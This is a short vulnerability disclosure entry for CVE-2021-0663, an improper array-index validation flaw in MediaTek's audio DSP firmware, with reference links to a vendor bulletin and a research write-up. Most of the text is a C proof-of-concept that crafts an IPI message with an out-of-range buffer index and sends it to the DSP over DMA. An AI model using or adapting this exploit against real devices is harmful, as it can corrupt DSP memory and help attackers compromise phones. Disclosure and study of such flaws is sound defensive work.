CVE-2021-0663
Information
Improper validation of array index in the audio_dsp_hw_open_op function of the
MediaTek audio DSP firmware.
PoC:
#define TASK_SCENE_DEEPBUFFER 8
#define AUDIO_DSP_TASK_PCM_PREPARE 0x203
int32_t drv = -1;
if (open_drv(drv) != 0)
return 0;
void* payload = malloc(MAX_IPI_MSG_PAYLOAD_SIZE);
*(uint32_t*)((uint8_t*)payload + 0x3C) = 1; // AUDIO_DSP_TASK_PCM_HWPARAM_DL
*(uint32_t*)((uint8_t*)payload + 0x50) = 1; // it's a hardware buffer
*(uint32_t*)((uint8_t*)payload + 0x54) = 0x1000; // the index
*(uint32_t*)((uint8_t*)payload + 0x58) = 1; // IRQ number
*(uint32_t*)((uint8_t*)payload + 0x5C) = 1; // DRAM memory
uint32_t base = 0x7d940000; // dma phy address
send_ipi_dma(drv, TASK_SCENE_DEEPBUFFER, AUDIO_DSP_TASK_PCM_PREPARE, 0xE0, base + 0x4600, payload);
References:
https://corp.mediatek.com/product-security-bulletin/October-2021
https://research.checkpoint.com/2021/looking-for-vulnerabilities-in-mediatek-audio-dsp